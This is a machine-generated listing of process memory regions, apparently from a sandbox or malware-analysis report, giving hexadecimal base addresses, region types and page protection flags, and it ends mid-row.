||
2390000
|
heap private
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
1CFF5000
|
unkown
|
page read and write
|
||
27B4000
|
heap private
|
page read and write
|
||
1D560000
|
unkown
|
page readonly
|
||
2FF0000
|
heap private
|
page read and write
|
||
562000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
34D3000
|
unkown
|
page read and write
|
||
21A0000
|
unkown
|
page readonly
|
||
1D2000
|
unkown image
|
page execute and read and write
|
||
550000
|
unkown
|
page write copy
|
||
DC000
|
unkown
|
page read and write
|
||
1F69000
|
unkown
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
||
2500000
|
unkown
|
page readonly
|
||
4A0000
|
heap default
|
page read and write
|
||
1DC000
|
unkown
|
page read and write
|
||
1D05F000
|
unkown
|
page read and write
|
||
4A7000
|
heap default
|
page read and write
|
||
312000
|
unkown image
|
page execute and read and write
|
||
354000
|
unkown image
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
484000
|
unkown
|
page read and write
|
||
4DD000
|
heap default
|
page read and write
|
||
422000
|
unkown image
|
page execute and read and write
|
||
295E000
|
stack
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
720000
|
unkown
|
page read and write
|
||
230000
|
heap private
|
page read and write
|
||
2A1E000
|
stack
|
page read and write
|
||
1B60000
|
unkown
|
page read and write
|
||
550000
|
heap default
|
page read and write
|
||
28DA000
|
heap private
|
page execute and read and write
|
||
29AE000
|
unkown
|
page read and write
|
||
1F20000
|
unkown
|
page readonly
|
||
187000
|
heap default
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
1D01F000
|
unkown
|
page read and write
|
||
577000
|
heap default
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
28C0000
|
unkown
|
page read and write
|
||
1E8000
|
heap default
|
page read and write
|
||
2A90000
|
heap private
|
page read and write
|
||
4C4000
|
heap default
|
page read and write
|
||
572000
|
unkown
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
557000
|
heap default
|
page read and write
|
||
350000
|
heap default
|
page read and write
|
||
23A4000
|
heap private
|
page read and write
|
||
3B0000
|
unkown
|
page readonly
|
||
585000
|
unkown
|
page read and write
|
||
23F2000
|
heap private
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
464000
|
unkown image
|
page read and write
|
||
308F000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
27EB000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
800000
|
unkown
|
page readonly
|
||
20B0000
|
unkown
|
page read and write
|
||
1B390000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
288E000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
2033000
|
unkown image
|
page execute read
|
||
180000
|
heap default
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
1BBAF000
|
heap private
|
page read and write
|
||
2800000
|
unkown
|
page write copy
|
||
274F000
|
stack
|
page read and write
|
||
295E000
|
unkown
|
page read and write
|
||
243E000
|
unkown
|
page read and write
|
||
4A0000
|
unkown
|
page readonly
|
||
2EF0000
|
unkown
|
page read and write
|
||
35D2000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
170000
|
heap private
|
page read and write
|
||
2550000
|
unkown
|
page readonly
|
||
23C2000
|
heap private
|
page read and write
|
||
473000
|
unkown image
|
page execute read
|
||
2A5D000
|
unkown
|
page read and write
|
||
2010000
|
unkown image
|
page readonly
|
||
2D05000
|
unkown
|
page read and write
|
||
482000
|
unkown image
|
page execute and read and write
|
||
60000
|
unkown
|
page readonly
|
||
190000
|
heap private
|
page read and write
|
||
1FA7000
|
unkown
|
page read and write
|
||
420000
|
unkown image
|
page execute and read and write
|
||
2EFE000
|
unkown
|
page read and write
|
||
434000
|
heap private
|
page read and write
|
||
275E000
|
unkown
|
page read and write
|
||
2D24000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
203B000
|
heap private
|
page read and write
|
||
380000
|
heap private
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
||
22A0000
|
unkown
|
page readonly
|
||
7FF00230000
|
unkown
|
page read and write
|
||
1CFCC000
|
unkown
|
page read and write
|
||
1D136000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
200000
|
unkown
|
page read and write
|
||
250000
|
heap default
|
page read and write
|
||
2E10000
|
unkown
|
page readonly
|
||
2ACA000
|
unkown
|
page read and write
|
||
1CFFF000
|
unkown
|
page read and write
|
||
770000
|
unkown
|
page readonly
|
||
2FAA000
|
unkown
|
page read and write
|
||
594000
|
heap default
|
page read and write
|
||
670000
|
heap private
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
4B8000
|
unkown image
|
page write copy
|
||
244000
|
unkown image
|
page read and write
|
||
7FF00100000
|
unkown
|
page read and write
|
||
544000
|
heap default
|
page read and write
|
||
1A0000
|
unkown
|
page read and write
|
||
1F2000
|
heap default
|
page read and write
|
||
2F5D000
|
unkown
|
page read and write
|
||
258D000
|
stack
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
35FB000
|
unkown
|
page read and write
|
||
154000
|
heap default
|
page read and write
|
||
35EE000
|
unkown
|
page read and write
|
||
3E7000
|
heap default
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
6C0000
|
unkown
|
page readonly
|
||
810000
|
unkown
|
page readonly
|
||
430000
|
heap private
|
page read and write
|
||
2E1E000
|
unkown
|
page read and write
|
||
660000
|
unkown
|
page read and write
|
||
2A0000
|
heap private
|
page read and write
|
||
4D7000
|
heap default
|
page read and write
|
||
F82000
|
heap private
|
page read and write
|
||
46A000
|
unkown image
|
page readonly
|
||
23D0000
|
heap private
|
page read and write
|
||
5B0000
|
heap private
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
26D0000
|
unkown
|
page readonly
|
||
452000
|
unkown image
|
page execute and read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
333000
|
heap default
|
page read and write
|
||
2650000
|
unkown
|
page readonly
|
||
440000
|
heap default
|
page read and write
|
||
594000
|
heap default
|
page read and write
|
||
9B0000
|
unkown
|
page readonly
|
||
2B00000
|
heap private
|
page read and write
|
||
19B000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
520000
|
heap default
|
page read and write
|
||
2E80000
|
unkown
|
page write copy
|
||
25D0000
|
unkown
|
page read and write
|
||
2504000
|
heap private
|
page read and write
|
||
1D0000
|
heap default
|
page read and write
|
||
2F0000
|
unkown image
|
page readonly
|
||
2E0000
|
heap default
|
page read and write
|
||
4FA000
|
heap default
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
2292000
|
heap private
|
page read and write
|
||
1E00000
|
unkown
|
page read and write
|
||
730000
|
unkown
|
page readonly
|
||
24F0000
|
heap private
|
page read and write
|
||
2107000
|
unkown
|
page readonly
|
||
EB000
|
stack
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
4CA000
|
unkown image
|
page readonly
|
||
17C000
|
unkown
|
page read and write
|
||
5AD000
|
heap default
|
page read and write
|
||
5A7000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
295E000
|
stack
|
page read and write
|
||
367F000
|
unkown
|
page read and write
|
||
6E0000
|
unkown
|
page read and write
|
||
1C7CD000
|
unkown
|
page read and write
|
||
301A000
|
unkown
|
page read and write
|
||
2D2000
|
unkown image
|
page execute and read and write
|
||
90000
|
unkown
|
page read and write
|
||
170000
|
heap default
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
12E31000
|
unkown
|
page read and write
|
||
1D025000
|
unkown
|
page read and write
|
||
1D03A000
|
unkown
|
page read and write
|
||
4DD000
|
heap default
|
page read and write
|
||
1B2000
|
heap default
|
page read and write
|
||
610000
|
unkown
|
page readonly
|
||
1CFB8000
|
unkown
|
page read and write
|
||
27AE000
|
unkown
|
page read and write
|
||
557000
|
heap default
|
page read and write
|
||
3180000
|
unkown
|
page readonly
|
||
31AF000
|
unkown
|
page read and write
|
||
2380000
|
heap private
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
27A4000
|
heap private
|
page read and write
|
||
1CEF000
|
unkown
|
page read and write
|
||
2B10000
|
unkown
|
page read and write
|
||
22C0000
|
unkown
|
page read and write
|
||
327D000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page read and write
|
||
261E000
|
stack
|
page read and write
|
||
51C000
|
heap default
|
page read and write
|
||
2450000
|
heap private
|
page read and write
|
||
549000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
2F0000
|
heap private
|
page read and write
|
||
2960000
|
unkown
|
page readonly
|
||
190000
|
heap default
|
page read and write
|
||
2340000
|
heap private
|
page read and write
|
||
9E0000
|
unkown
|
page readonly
|
||
25A0000
|
heap private
|
page read and write
|
||
35C2000
|
unkown
|
page read and write
|
||
C0000
|
unkown
|
page execute and read and write
|
||
26C000
|
unkown
|
page read and write
|
||
420000
|
unkown image
|
page execute and read and write
|
||
1B0000
|
unkown image
|
page readonly
|
||
130000
|
unkown
|
page readonly
|
||
12CEC000
|
unkown
|
page read and write
|
||
1FD0000
|
unkown
|
page readonly
|
||
574000
|
heap default
|
page read and write
|
||
3092000
|
unkown
|
page read and write
|
||
35E8000
|
unkown
|
page read and write
|
||
3E0000
|
unkown
|
page readonly
|
||
2AD5000
|
unkown
|
page read and write
|
||
2AF000
|
stack
|
page read and write
|
||
290000
|
heap default
|
page read and write
|
||
2EEE000
|
unkown
|
page read and write
|
||
F0000
|
heap default
|
page read and write
|
||
3601000
|
unkown
|
page read and write
|
||
FC000
|
unkown
|
page read and write
|
||
360000
|
unkown
|
page execute and read and write
|
||
267D000
|
unkown
|
page read and write
|
||
1C30000
|
unkown
|
page readonly
|
||
1CFEA000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
1D021000
|
unkown
|
page read and write
|
||
420000
|
unkown image
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1E0000
|
unkown image
|
page readonly
|
||
498000
|
heap private
|
page read and write
|
||
2137000
|
unkown
|
page readonly
|
||
227000
|
heap default
|
page read and write
|
||
4B4000
|
unkown image
|
page read and write
|
||
1DE0000
|
unkown
|
page read and write
|
||
1B7000
|
heap default
|
page read and write
|
||
2C2000
|
heap private
|
page read and write
|
||
170000
|
heap private
|
page read and write
|
||
2610000
|
heap private
|
page read and write
|
||
9CC000
|
unkown
|
page read and write
|
||
2274000
|
heap private
|
page read and write
|
||
380000
|
heap default
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
110000
|
heap default
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
1F50000
|
unkown
|
page readonly
|
||
770000
|
unkown
|
page readonly
|
||
2D8C000
|
unkown
|
page read and write
|
||
1D01C000
|
unkown
|
page read and write
|
||
940000
|
unkown
|
page readonly
|
||
384000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
2EBD000
|
stack
|
page read and write
|
||
2510000
|
heap private
|
page read and write
|
||
140000
|
heap private
|
page read and write
|
||
770000
|
heap private
|
page read and write
|
||
1D039000
|
unkown
|
page read and write
|
||
3415000
|
unkown
|
page read and write
|
||
210000
|
unkown
|
page readonly
|
||
1FA7000
|
unkown
|
page readonly
|
||
3C0000
|
heap default
|
page read and write
|
||
2B8D000
|
unkown
|
page read and write
|
||
1D051000
|
unkown
|
page read and write
|
||
3CA000
|
heap default
|
page read and write
|
||
35D5000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
2540000
|
unkown
|
page readonly
|
||
1D367000
|
unkown
|
page readonly
|
||
28C0000
|
unkown
|
page read and write
|
||
5A0000
|
unkown
|
page readonly
|
||
1FA9000
|
unkown
|
page read and write
|
||
2300000
|
unkown
|
page readonly
|
||
4A0000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
260000
|
unkown
|
page read and write
|
||
240000
|
heap private
|
page read and write
|
||
2A1E000
|
stack
|
page read and write
|
||
1E8000
|
unkown image
|
page write copy
|
||
1EA000
|
unkown image
|
page readonly
|
||
28C0000
|
unkown
|
page read and write
|
||
289D000
|
unkown
|
page read and write
|
||
527000
|
heap default
|
page read and write
|
||
233F000
|
stack
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
310000
|
heap private
|
page read and write
|
||
330000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
2950000
|
unkown
|
page read and write
|
||
1B96000
|
unkown
|
page read and write
|
||
3BB2000
|
unkown
|
page read and write
|
||
23CD000
|
unkown
|
page read and write
|
||
1BCAE000
|
unkown
|
page read and write
|
||
106000
|
unkown
|
page read and write
|
||
1BC000
|
unkown
|
page read and write
|
||
1DC000
|
unkown
|
page read and write
|
||
180000
|
unkown image
|
page readonly
|
||
2030000
|
unkown image
|
page execute and read and write
|
||
2005000
|
heap private
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
23D0000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3EA000
|
heap default
|
page read and write
|
||
470000
|
unkown
|
page readonly
|
||
AC000
|
unkown
|
page read and write
|
||
358000
|
unkown image
|
page write copy
|
||
1FA7000
|
unkown
|
page readonly
|
||
557000
|
heap default
|
page read and write
|
||
750000
|
unkown image
|
page readonly
|
||
FD0000
|
heap private
|
page read and write
|
||
46B000
|
unkown
|
page read and write
|
||
2A0000
|
heap private
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
230000
|
heap private
|
page read and write
|
||
2FEE000
|
unkown
|
page read and write
|
||
5A0000
|
unkown
|
page readonly
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
475000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
6A0000
|
heap private
|
page read and write
|
||
440000
|
unkown
|
page read and write
|
||
2A8000
|
heap private
|
page read and write
|
||
2440000
|
heap private
|
page read and write
|
||
1D0000
|
unkown
|
page read and write
|
||
2B0000
|
unkown image
|
page readonly
|
||
550000
|
heap default
|
page read and write
|
||
226D000
|
unkown
|
page read and write
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
430000
|
unkown image
|
page readonly
|
||
2A0000
|
heap private
|
page read and write
|
||
EB000
|
unkown
|
page read and write
|
||
394000
|
heap default
|
page read and write
|
||
2A20000
|
unkown
|
page readonly
|
||
9D0000
|
unkown
|
page readonly
|
||
2F6E000
|
stack
|
page read and write
|
||
4C8000
|
unkown image
|
page write copy
|
||
500000
|
unkown
|
page readonly
|
||
300000
|
heap default
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
366A000
|
unkown
|
page read and write
|
||
1CFF1000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page readonly
|
||
1CC90000
|
heap private
|
page read and write
|
||
24A000
|
unkown image
|
page readonly
|
||
374000
|
heap default
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
207A000
|
unkown image
|
page readonly
|
||
1CF80000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
27BE000
|
unkown
|
page read and write
|
||
1C60000
|
unkown
|
page readonly
|
||
470000
|
unkown
|
page readonly
|
||
29CE000
|
stack
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
360000
|
heap default
|
page read and write
|
||
2750000
|
unkown
|
page readonly
|
||
58D000
|
heap default
|
page read and write
|
||
2A5E000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1D025000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
3C98000
|
unkown
|
page read and write
|
||
423000
|
unkown image
|
page execute read
|
||
2FA2000
|
unkown
|
page read and write
|
||
3196000
|
unkown
|
page read and write
|
||
7C0000
|
heap private
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
150000
|
heap private
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
5B0000
|
unkown
|
page readonly
|
||
26A4000
|
unkown
|
page read and write
|
||
1EC000
|
unkown
|
page read and write
|
||
2FE4000
|
unkown
|
page read and write
|
||
330000
|
heap private
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
570000
|
heap default
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
607000
|
heap default
|
page read and write
|
||
288E000
|
unkown
|
page read and write
|
||
2CC000
|
stack
|
page read and write
|
||
2F2E000
|
stack
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
2570000
|
unkown
|
page readonly
|
||
AC000
|
stack
|
page read and write
|
||
46A000
|
unkown image
|
page readonly
|
||
2B04000
|
heap private
|
page read and write
|
||
26D0000
|
unkown
|
page readonly
|
||
800000
|
heap private
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
23D4000
|
heap private
|
page read and write
|
||
773000
|
unkown image
|
page execute read
|
||
7EFDF000
|
unkown
|
page read and write
|
||
34C0000
|
unkown
|
page read and write
|
||
1D01F000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
6F0000
|
unkown
|
page read and write
|
||
12DD1000
|
unkown
|
page read and write
|
||
960000
|
heap private
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
2910000
|
heap private
|
page execute and read and write
|
||
21E0000
|
unkown
|
page readonly
|
||
FC000
|
unkown
|
page read and write
|
||
7BC000
|
unkown
|
page read and write
|
||
2632000
|
heap private
|
page read and write
|
||
7BA000
|
unkown image
|
page readonly
|
||
690000
|
heap private
|
page read and write
|
||
12F10000
|
unkown
|
page read and write
|
||
55D000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
3C7000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
3A0000
|
heap default
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
31A000
|
unkown image
|
page readonly
|
||
450000
|
unkown image
|
page execute and read and write
|
||
3076000
|
unkown
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
180000
|
heap private
|
page read and write
|
||
297E000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
27FC000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
28C0000
|
unkown
|
page read and write
|
||
23B0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
2F2E000
|
stack
|
page read and write
|
||
2E8000
|
unkown image
|
page write copy
|
||
3A7000
|
heap default
|
page read and write
|
||
810000
|
heap private
|
page read and write
|
||
DD0000
|
heap private
|
page read and write
|
||
F60000
|
heap private
|
page read and write
|
||
2F40000
|
unkown
|
page read and write
|
||
1BB79000
|
heap private
|
page read and write
|
||
464000
|
unkown image
|
page read and write
|
||
2390000
|
heap private
|
page read and write
|
||
1C10000
|
unkown
|
page readonly
|
||
400000
|
unkown image
|
page readonly
|
||
2137000
|
unkown
|
page readonly
|
||
180000
|
unkown
|
page read and write
|
||
7E0000
|
heap private
|
page read and write
|
||
300000
|
heap private
|
page read and write
|
||
25B0000
|
heap private
|
page read and write
|
||
7FF00170000
|
unkown
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
1CCA3000
|
heap private
|
page read and write
|
||
1D0000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
422000
|
unkown image
|
page execute and read and write
|
||
7FF000F2000
|
unkown
|
page execute and read and write
|
||
1CFDE000
|
unkown
|
page read and write
|
||
1BD5C000
|
unkown
|
page read and write
|
||
2EFE000
|
stack
|
page read and write
|
||
1CFC1000
|
unkown
|
page read and write
|
||
6D3000
|
unkown image
|
page execute read
|
||
466000
|
unkown image
|
page read and write
|
||
11E000
|
heap default
|
page read and write
|
||
1EC0000
|
unkown
|
page read and write
|
||
25C2000
|
heap private
|
page read and write
|
||
2C7000
|
heap default
|
page read and write
|
||
A5D000
|
heap default
|
page read and write
|
||
1AD20000
|
unkown
|
page read and write
|
||
2F11000
|
unkown
|
page read and write
|
||
46A000
|
unkown image
|
page readonly
|
||
1D05E000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2660000
|
unkown
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
810000
|
unkown
|
page readonly
|
||
2390000
|
unkown
|
page readonly
|
||
25A4000
|
heap private
|
page read and write
|
||
1D180000
|
unkown
|
page readonly
|
||
2AD0000
|
unkown
|
page read and write
|
||
12CC1000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
2444000
|
heap private
|
page read and write
|
||
4F0000
|
heap private
|
page read and write
|
||
2F36000
|
unkown
|
page read and write
|
||
21F0000
|
heap private
|
page read and write
|
||
1DF7000
|
unkown
|
page readonly
|
||
5AD000
|
heap default
|
page read and write
|
||
3614000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page read and write
|
||
370000
|
heap default
|
page read and write
|
||
2F21000
|
unkown
|
page read and write
|
||
26DC000
|
unkown
|
page read and write
|
||
22C000
|
stack
|
page read and write
|
||
420000
|
unkown image
|
page execute and read and write
|
||
1EC0000
|
unkown
|
page read and write
|
||
2F70000
|
unkown
|
page write copy
|
||
3C0000
|
heap private
|
page read and write
|
||
2FCE000
|
unkown
|
page read and write
|
||
2FB7000
|
unkown
|
page read and write
|
||
2A60000
|
unkown
|
page readonly
|
||
250000
|
unkown
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
28DE000
|
stack
|
page read and write
|
||
2F0000
|
heap private
|
page read and write
|
||
2E00000
|
unkown
|
page write copy
|
||
27D0000
|
unkown
|
page readonly
|
||
2E6E000
|
unkown
|
page read and write
|
||
3F0000
|
heap default
|
page read and write
|
||
1D061000
|
unkown
|
page read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
2560000
|
unkown
|
page readonly
|
||
28E0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
21C000
|
unkown
|
page read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
570000
|
heap default
|
page read and write
|
||
3FD000
|
heap default
|
page read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
57E000
|
heap default
|
page read and write
|
||
1FC000
|
heap default
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
49A000
|
unkown image
|
page readonly
|
||
2730000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2F2E000
|
unkown
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
202000
|
unkown image
|
page execute and read and write
|
||
1ECE000
|
unkown
|
page read and write
|
||
367B000
|
unkown
|
page read and write
|
||
2480000
|
heap private
|
page read and write
|
||
94F000
|
stack
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
||
2F0000
|
heap private
|
page read and write
|
||
650000
|
unkown
|
page readonly
|
||
1D50000
|
heap private
|
page read and write
|
||
3209000
|
unkown
|
page read and write
|
||
2F24000
|
unkown
|
page read and write
|
||
810000
|
unkown
|
page readonly
|
||
1CFF2000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
140000
|
unkown
|
page read and write
|
||
214000
|
unkown image
|
page read and write
|
||
1CFF9000
|
unkown
|
page read and write
|
||
AC3000
|
heap default
|
page read and write
|
||
25E0000
|
unkown
|
page readonly
|
||
1F50000
|
unkown
|
page readonly
|
||
27F0000
|
unkown
|
page readonly
|
||
490000
|
unkown
|
page readonly
|
||
423000
|
unkown image
|
page execute read
|
||
4F0000
|
heap default
|
page read and write
|
||
203000
|
unkown image
|
page execute read
|
||
2270000
|
heap private
|
page read and write
|
||
483000
|
unkown image
|
page execute read
|
||
3298000
|
unkown
|
page read and write
|
||
1EC0000
|
unkown
|
page read and write
|
||
2FB3000
|
unkown
|
page read and write
|
||
882000
|
heap private
|
page read and write
|
||
24D0000
|
heap private
|
page read and write
|
||
1FE7000
|
unkown
|
page readonly
|
||
830000
|
unkown
|
page readonly
|
||
520000
|
heap private
|
page read and write
|
||
3B7000
|
heap default
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
323F000
|
unkown
|
page read and write
|
||
27CE000
|
unkown
|
page read and write
|
||
7FF00132000
|
unkown
|
page execute and read and write
|
||
21A0000
|
unkown
|
page readonly
|
||
4F4000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page readonly
|
||
3B0000
|
heap default
|
page read and write
|
||
217000
|
heap private
|
page read and write
|
||
27C0000
|
unkown
|
page readonly
|
||
2078000
|
unkown image
|
page write copy
|
||
2F2E000
|
stack
|
page read and write
|
||
31D000
|
stack
|
page read and write
|
||
2CD000
|
heap default
|
page read and write
|
||
6D2000
|
unkown image
|
page execute and read and write
|
||
1A1000
|
heap default
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
268F000
|
unkown
|
page read and write
|
||
1E4000
|
unkown image
|
page read and write
|
||
670000
|
unkown
|
page readonly
|
||
287F000
|
stack
|
page read and write
|
||
38E000
|
unkown
|
page read and write
|
||
2CC1000
|
unkown
|
page read and write
|
||
2460000
|
unkown
|
page readonly
|
||
2470000
|
heap private
|
page read and write
|
||
710000
|
heap private
|
page read and write
|
||
2E50000
|
unkown
|
page write copy
|
||
307E000
|
unkown
|
page read and write
|
||
E5000
|
unkown
|
page read and write | page guard
|
||
7FF002B0000
|
unkown
|
page execute and read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
1E17000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page readonly
|
||
1D0C0000
|
unkown
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
2CF6000
|
unkown
|
page read and write
|
||
A27000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
465000
|
unkown image
|
page write copy
|
||
270000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
1A4000
|
heap default
|
page read and write
|
||
230000
|
unkown
|
page execute and read and write
|
||
1D059000
|
unkown
|
page read and write
|
||
2500000
|
heap private
|
page read and write
|
||
22C0000
|
heap private
|
page read and write
|
||
3E4000
|
heap default
|
page read and write
|
||
422000
|
unkown image
|
page execute and read and write
|
||
100000
|
heap default
|
page read and write
|
||
2EDE000
|
stack
|
page read and write
|
||
2DC0000
|
unkown
|
page write copy
|
||
21A0000
|
unkown
|
page readonly
|
||
4D7000
|
heap default
|
page read and write
|
||
300E000
|
stack
|
page read and write
|
||
2380000
|
unkown
|
page readonly
|
||
510000
|
unkown
|
page readonly
|
||
1DC0000
|
unkown
|
page readonly
|
||
7D0000
|
heap private
|
page read and write
|
||
422000
|
unkown image
|
page execute and read and write
|
||
3CE000
|
unkown
|
page read and write
|
||
2CBF000
|
unkown
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
5D0000
|
heap private
|
page read and write
|
||
3054000
|
unkown
|
page read and write
|
||
9B0000
|
unkown
|
page readonly
|
||
A1E000
|
stack
|
page read and write
|
||
400000
|
unkown image
|
page readonly
|
||
2A3000
|
unkown image
|
page execute read
|
||
1D40000
|
unkown
|
page readonly
|
||
1CFC5000
|
unkown
|
page read and write
|
||
3C16000
|
unkown
|
page read and write
|
||
2F5E000
|
unkown
|
page read and write
|
||
2462000
|
heap private
|
page read and write
|
||
200000
|
unkown image
|
page execute and read and write
|
||
3A81000
|
unkown
|
page read and write
|
||
830000
|
unkown
|
page read and write
|
||
3D3000
|
heap default
|
page read and write
|
||
21A0000
|
unkown
|
page read and write
|
||
AC000
|
stack
|
page read and write
|
||
2ADA000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
314000
|
unkown image
|
page read and write
|
||
2D90000
|
unkown
|
page readonly
|
||
282C000
|
unkown
|
page read and write
|
||
7D0000
|
unkown
|
page readonly
|
||
46A000
|
unkown image
|
page readonly
|
||
9F8000
|
heap private
|
page read and write
|
||
390000
|
unkown
|
page readonly
|
||
2137000
|
unkown
|
page readonly
|
||
6D0000
|
unkown
|
page readonly
|
||
2492000
|
heap private
|
page read and write
|
||
2B46000
|
unkown
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
466000
|
unkown image
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
300000
|
unkown
|
page readonly
|
||
3216000
|
unkown
|
page read and write
|
||
2A60000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page read and write
|
||
2AC0000
|
unkown
|
page readonly
|
||
422000
|
unkown image
|
page execute and read and write
|
||
2A2000
|
unkown image
|
page execute and read and write
|
||
27A0000
|
heap private
|
page read and write
|
||
22F0000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
5A0000
|
heap private
|
page read and write
|
||
23A0000
|
heap private
|
page read and write
|
||
660000
|
unkown
|
page readonly
|
||
90E000
|
unkown
|
page read and write
|
||
468000
|
unkown image
|
page write copy
|
||
1B4A0000
|
unkown
|
page write copy
|
||
22A0000
|
unkown
|
page readonly
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
450000
|
unkown image
|
page readonly
|
||
3A0000
|
heap private
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
1E0000
|
unkown
|
page read and write
|
||
7EFDF000
|
